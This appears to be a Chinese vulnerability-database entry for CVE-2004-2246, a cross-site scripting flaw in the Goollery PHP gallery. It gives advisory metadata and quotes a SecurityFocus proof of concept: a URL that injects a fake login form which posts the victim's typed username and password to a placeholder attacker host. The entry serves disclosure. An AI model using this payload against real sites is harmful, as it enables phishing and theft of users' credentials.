Goollery跨站脚本漏洞

Goollery跨站脚本漏洞

漏洞ID 1108261 漏洞类型 跨站脚本
发布时间 2004-11-02 更新时间 2004-12-31
图片[1]-Goollery跨站脚本漏洞-安全小百科CVE编号 CVE-2004-2246
图片[2]-Goollery跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200412-468
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24718
https://www.securityfocus.com/bid/82576
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-468
|漏洞详情
Goollery0.04b之前版本存在跨站脚本(XSS)漏洞。远程攻击者可以借助viewpic.php的conversation_id参数注入任意HTML或web脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/11587/info

It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. 

These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts. 

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20na
me="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login
"></form>
|受影响的产品
Goollery Goollery 0.3
|参考资料

来源:OSVDB
名称:11624
链接:http://www.osvdb.org/11624
来源:www.osvdb.org
链接:http://www.osvdb.org/ref/11/11624-goollery-viewpic.txt

相关推荐: DAWKCo POP3 with WebMAIL Extension Session Timeout Unauthorized Access Vulnerability

DAWKCo POP3 with WebMAIL Extension Session Timeout Unauthorized Access Vulnerability 漏洞ID 1098801 漏洞类型 Design Error 发布时间 2004-03-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享